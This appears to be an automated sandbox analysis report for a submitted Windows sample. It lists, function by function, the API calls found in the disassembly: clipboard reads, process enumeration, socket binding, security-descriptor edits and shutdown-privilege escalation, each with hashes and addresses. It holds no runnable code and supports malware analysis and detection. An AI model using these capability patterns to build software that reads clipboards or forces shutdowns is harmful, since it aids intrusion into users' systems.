                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Timetime$Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: BUTTON
• API String ID: 4176159691-3405671355
• Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
• Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
• Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
• Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
APIs
  • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
  • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
  • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
  • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
• GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
• _memset.LIBCMT ref: 00445E61
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
• GetLengthSid.ADVAPI32(?), ref: 00445E92
• GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
• GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
• GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
• CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
• SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
• String ID:
• API String ID: 3490752873-0
• Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
• Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
• Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
• Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
APIs
• OleInitialize.OLE32(00000000), ref: 0047AA03
• CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
• CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
• _memset.LIBCMT ref: 0047AB7C
• _wcslen.LIBCMT ref: 0047AC68
• _memset.LIBCMT ref: 0047ACCD
• CoCreateInstanceEx.OLE32 ref: 0047AD06
• CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
Strings
• NULL Pointer assignment, xrefs: 0047AD84
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
• String ID: NULL Pointer assignment
• API String ID: 1588287285-2785691316
• Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
• Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
• Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
• Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
• OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
• AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
• GetLastError.KERNEL32 ref: 00436504
• ExitWindowsEx.USER32(?,00000000), ref: 00436527
• InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
• SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
Strings
Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2938487562-3733053543
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00436162
                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00436176
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00436185
                                                                                                                                                                                                                                                                                                                                                                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                                                                                                                                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                                                                                                                                                                                                                                                                                                                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                                                                                                                                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                                                                                                                                                                                                                                                                                                                                                                • LockResource.KERNEL32(?), ref: 004361FD
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2406429042-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0045D59D
                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
• Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
• Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
• Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
APIs
• MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
• OleInitialize.OLE32(00000000), ref: 0047AE06
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
• _wcslen.LIBCMT ref: 0047AE18
• CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
• CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
• GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
• String ID: HH
• API String ID: 1915432386-2761332787
• Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
• Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
• Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
• Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID:
• String ID: DEFINE$`$h$h
• API String ID: 0-4194577831
• Opcode ID: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
• Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
• Opcode Fuzzy Hash: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
• Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000000), ref: 004648B0
• WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
• bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648DA
• WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
• closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000005,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 0046492D
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: ErrorLast$bindclosesocketsocket
• String ID:
• API String ID: 2609815416-0
• Opcode ID: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                                                                                                                                                                                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                                                                                                                                                                                                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 004370A5
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 004370BA
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 004370C8
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2547909840-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2693929171-438819550
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • OpenClipboard.USER32(?), ref: 0046C635
                                                                                                                                                                                                                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046C65D
                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046C692
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
• GetClipboardData.USER32(00000001), ref: 0046C6DD
• GlobalLock.KERNEL32(00000000), ref: 0046C6EE
• GlobalUnlock.KERNEL32(00000000), ref: 0046C726
